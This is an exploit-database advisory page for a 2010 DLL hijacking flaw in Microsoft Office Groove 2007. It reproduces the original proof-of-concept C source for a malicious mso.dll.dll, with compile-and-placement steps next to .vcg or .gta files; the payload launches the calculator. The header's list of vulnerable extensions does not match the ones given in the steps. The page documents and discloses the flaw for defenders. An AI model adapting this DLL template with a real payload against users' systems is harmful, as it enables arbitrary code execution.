Microsoft Office Groove 2007 DLL Hijacking

vendor:

Office Groove 2007

by:

Beenu Arora

7,8

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Office Groove 2007

Affected Version From: Microsoft Office Groove 2007

Affected Version To: Microsoft Office Groove 2007

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:office_groove_2007

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Microsoft Office Groove 2007 DLL Hijacking

Microsoft Office Groove 2007 is vulnerable to DLL Hijacking. An attacker can exploit this vulnerability by creating a malicious DLL file and placing it in the same directory as the vulnerable application. The malicious DLL file can be named mso.dll.dll and have one of the following extensions: .vcg, .gta. When the vulnerable application is executed, the malicious DLL will be loaded and executed.

Mitigation:

Ensure that applications are not vulnerable to DLL hijacking by using the latest version of the software and applying the latest security patches.

Source

Exploit-DB raw data:

/* 
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora, Anirban ,Ganesha, Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: Microsoft Office Groove 2007 DLL Hijacking 
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Office Groove 2007
Vulnerable extensions: wab , p7c

Compile and rename to mso.dll.dll, create a file in the same dir with one of the following extensions:
.vcg , .gta
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14746.zip